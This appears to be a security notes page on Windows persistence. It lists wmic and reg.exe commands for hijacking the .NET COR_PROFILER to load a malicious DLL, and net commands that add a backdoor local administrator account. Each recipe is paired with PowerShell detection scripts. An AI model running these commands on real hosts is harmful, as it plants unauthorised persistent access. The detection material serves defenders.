Persistence

The adversary is trying to maintain their foothold. https://attack.mitre.org/tactics/TA0003/

COR Profiler Variable Hijack

Source: https://www.picussecurity.com/resource/blog/t1047-windows-management-instrumentation-of-the-mitre-attack-framework

# deleting existing COR_PROFILER variable
wmic ENVIRONMENT where "name='COR_PROFILER'" delete

# creating COR_ENABLE_PROFILING variable and setting it to 1
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="<system>",VariableValue="1"

# creating a new COR_PROFILER variable
wmic ENVIRONMENT create name="COR_PROFILER",username="<system>",VariableValue="<arbitrary CLSID>"

# adding registry keys for malicious DLL
reg.exe add HKLM\Software\Classes\CLSID\<arbitrary CLSID>\InProcServer32 /V ThreadingModel /T REG_SZ /D Apartment /F
reg.exe add HKLM\Software\Classes\CLSID\<arbitrary CLSID>\InProcServer32 /VE /T REG_SZ /D "<malicious_DLL>" /F
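The two variables and the CLSID registration above are the entire footprint of this technique (MITRE catalogues it as T1574.012, Hijack Execution Flow: COR_PROFILER), so a host can be audited for it directly. The following PowerShell is an added example written for this page, not code from the original notes or from the Picus post: it reads the machine-wide and loaded per-user Environment keys for the .NET Framework and .NET Core profiler variables, resolves any CLSID it finds to the DLL behind InProcServer32 in both the 64-bit and WOW6432Node class roots, and reports the DLL's Authenticode status. It assumes an elevated session on a host where no profiler is expected; the variable names and registry paths are the documented ones, everything else (variable names in the script, output shape) is the example's own choice.

```powershell
# Added example (not from the original page): audit the COR profiler environment
# variables that the wmic commands above set, and resolve any CLSID to its DLL.
# Assumes it runs elevated on a Windows host where no CLR profiler is expected.

$machineKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment'
$profilerVars = 'COR_ENABLE_PROFILING', 'COR_PROFILER', 'COR_PROFILER_PATH',
                'CORECLR_ENABLE_PROFILING', 'CORECLR_PROFILER', 'CORECLR_PROFILER_PATH'

$findings = @()

# Machine-wide variables (what "username=<system>" in wmic writes to)
$machineEnv = Get-ItemProperty -Path $machineKey
foreach ($name in $profilerVars) {
    if ($null -ne $machineEnv.$name) {
        $findings += [pscustomobject]@{ Scope = 'Machine'; Name = $name; Value = $machineEnv.$name }
    }
}

# Per-user variables for every hive currently loaded under HKEY_USERS
Get-ChildItem 'Registry::HKEY_USERS' | ForEach-Object {
    $userKey = "Registry::$($_.Name)\Environment"
    if (Test-Path $userKey) {
        $userEnv = Get-ItemProperty -Path $userKey
        foreach ($name in $profilerVars) {
            if ($null -ne $userEnv.$name) {
                $findings += [pscustomobject]@{ Scope = $_.PSChildName; Name = $name; Value = $userEnv.$name }
            }
        }
    }
}

if (-not $findings) {
    Write-Output 'No COR profiler variables found.'
    return
}

$findings | Format-Table -AutoSize

# Resolve each *_PROFILER CLSID to the DLL that InProcServer32 points at, in every
# class root an in-process server can be registered under, and check its signature.
$resolved = $findings |
    Where-Object { $_.Name -match '_PROFILER$' -and $_.Value -match '^\{?[0-9A-Fa-f-]{36}\}?$' } |
    ForEach-Object {
        $clsid = $_.Value.Trim('{}')
        foreach ($root in 'HKLM:\SOFTWARE\Classes', 'HKLM:\SOFTWARE\WOW6432Node\Classes', 'HKCU:\SOFTWARE\Classes') {
            $key = "$root\CLSID\{$clsid}\InProcServer32"
            if (Test-Path $key) {
                $dll = (Get-ItemProperty -Path $key).'(default)'
                $status = if ($dll -and (Test-Path $dll)) { (Get-AuthenticodeSignature -FilePath $dll).Status } else { 'FileMissing' }
                [pscustomobject]@{ CLSID = $clsid; Key = $key; DLL = $dll; Signature = $status }
            }
        }
    }

if ($resolved) { $resolved | Format-Table -AutoSize } else { Write-Output 'Profiler variable set but no InProcServer32 registration found.' }
```

Any hit is worth a look: COR_ENABLE_PROFILING=1 on a machine that is not running a profiling or APM agent is itself the indicator, and a DLL under a user-writable path or with a signature status other than Valid should be treated as suspect. For continuous detection, Sysmon Event ID 13 (registry value set) on the Session Manager\Environment key and on CLSID\...\InProcServer32 catches both halves of the sequence above as they are written.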

Local Administrator Account Creation

net user burmat BURMAT123123123 /add
net localgroup administrators burmat /add
net localgroup administrators
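Both commands above leave a fixed trail in the Security log: event 4720 (a user account was created) and event 4732 (a member was added to a security-enabled local group). The PowerShell below is an added example written for this page, not code from the original notes: it baselines the current membership of the built-in Administrators group (looked up by its well-known SID rather than by name, so renamed or localized groups are still found) and then pulls the two events from the last 24 hours, flagging any 4732 whose target group is Administrators. It assumes an elevated session on Windows 8.1 / Server 2012 R2 or later (for the LocalAccounts cmdlets) and that the "Audit User Account Management" and "Audit Security Group Management" subcategories are enabled; the `$hours` window is the example's own parameter.

```powershell
# Added example (not from the original page): baseline the local Administrators group
# and surface the Security events that "net user /add" and "net localgroup /add" produce.
# Assumes an elevated session and that account/group management auditing is enabled.

$hours = 24                               # look-back window, adjust as needed
$adminSid = 'S-1-5-32-544'                # well-known SID of BUILTIN\Administrators

# Current membership, resolved by SID so a renamed group is still found
$adminGroup = Get-LocalGroup -SID $adminSid
Write-Output "Current members of $($adminGroup.Name):"
Get-LocalGroupMember -SID $adminSid |
    Select-Object Name, ObjectClass, PrincipalSource |
    Format-Table -AutoSize

# Pull account-creation and local-group-membership events from the Security log
$filter = @{ LogName = 'Security'; Id = 4720, 4732; StartTime = (Get-Date).AddHours(-$hours) }
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

$report = foreach ($e in $events) {
    # Flatten the EventData fields into a hashtable keyed by field name
    $xml = [xml]$e.ToXml()
    $d = @{}
    foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

    switch ($e.Id) {
        4720 {
            [pscustomobject]@{
                Time    = $e.TimeCreated
                Event   = 'LocalAccountCreated'
                Target  = $d.TargetUserName
                Group   = ''
                By      = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
                Flag    = 'review'
            }
        }
        4732 {
            # 4732 records the new member as a SID; resolve it to a name where possible
            $member = $d.MemberSid
            try {
                $member = (New-Object System.Security.Principal.SecurityIdentifier $d.MemberSid).
                    Translate([System.Security.Principal.NTAccount]).Value
            } catch { }
            [pscustomobject]@{
                Time    = $e.TimeCreated
                Event   = 'AddedToLocalGroup'
                Target  = $member
                Group   = $d.TargetUserName
                By      = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
                Flag    = if ($d.TargetSid -eq $adminSid) { 'ADMIN GROUP' } else { '' }
            }
        }
    }
}

if ($report) {
    $report | Sort-Object Time | Format-Table -AutoSize
} else {
    Write-Output "No 4720/4732 events in the last $hours hours (check that auditing is enabled)."
}
```

Correlating the two events is the useful part: a 4720 followed within seconds by a 4732 into Administrators, both with the same SubjectUserName, is exactly the sequence the two `net` commands above generate, and is rare in normal administration outside provisioning windows.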
